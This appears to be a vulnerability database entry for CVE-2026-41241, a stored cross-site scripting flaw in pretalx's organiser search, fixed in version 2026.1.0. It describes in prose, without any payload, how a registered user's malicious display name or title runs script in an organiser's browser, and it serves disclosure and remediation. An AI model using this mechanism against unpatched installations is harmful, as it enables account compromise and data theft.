CVE-2026-41241
Published: 23 April 2026
Summary
CVE-2026-41241 is a high-severity Cross-site Scripting (CWE-79) vulnerability in Pretalx Pretalx. Its CVSS base score is 8.7 (High).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked at the 6.2th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 SI-15 (Information Output Filtering) and SI-2 (Flaw Remediation).
Deeper analysis
CVE-2026-41241 is a cross-site scripting (XSS) vulnerability, classified under CWE-79, affecting pretalx, an open-source conference planning tool. Published on 2026-04-23, the issue exists in versions prior to 2026.1.0, where the organizer search functionality in the pretalx backend renders submission titles, speaker display names, and user names or emails into the result dropdown using unsafe innerHTML string interpolation.
The vulnerability can be exploited by any registered user who controls one of the affected fields, such as their own display name, which may be looked up by an administrator. When an organizer performs a search query that matches the malicious record, the injected HTML or JavaScript executes in the organizer's browser. Attackers require low privileges (PR:L) and user interaction from the organizer (UI:R), enabling network-based exploitation (AV:N) with low complexity (AC:L) to achieve high confidentiality and integrity impacts (C:H/I:H) across changed security scopes (S:C), as scored at CVSS 8.7 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N).
The vulnerability is addressed in pretalx version 2026.1.0. Additional details on the issue and mitigation are available in the GitHub security advisory at https://github.com/pretalx/pretalx/security/advisories/GHSA-cjcx-jfp2-f7m2.
OWASP Top 10 for Web (2025)
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2026-25273
Vulnerability details
pretalx is a conference planning tool. Prior to 2026.1.0, The organiser search in the pretalx backend rendered submission titles, speaker display names, and user names/emails into the result dropdown using innerHTML string interpolation. Any user who controls one of those…
more
fields (which includes any registered user whose display name is looked up by an administrator) could include HTML or JavaScript that would execute in an organiser's browser when the organiser's search query matched the malicious record. This vulnerability is fixed in 2026.1.0.
- CWE(s)
Related Threats
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
XSS in web app enables exploitation of public-facing application (T1190) and arbitrary JavaScript execution in victim's browser (T1059.007).
CVEs Like This One
Affected Assets
Mitigating Controls
Mitigating Controls (NIST 800-53 r5) AI
Directly mitigates XSS by requiring output filtering and encoding of user-controlled fields like submission titles and display names before rendering in the search dropdown via innerHTML.
Validates user inputs such as display names, speaker names, and emails to reject or sanitize malicious HTML/JavaScript prior to storage and rendering.
Ensures timely identification, reporting, and patching of the specific flaw in pretalx versions prior to 2026.1.0 that enables unsafe innerHTML interpolation.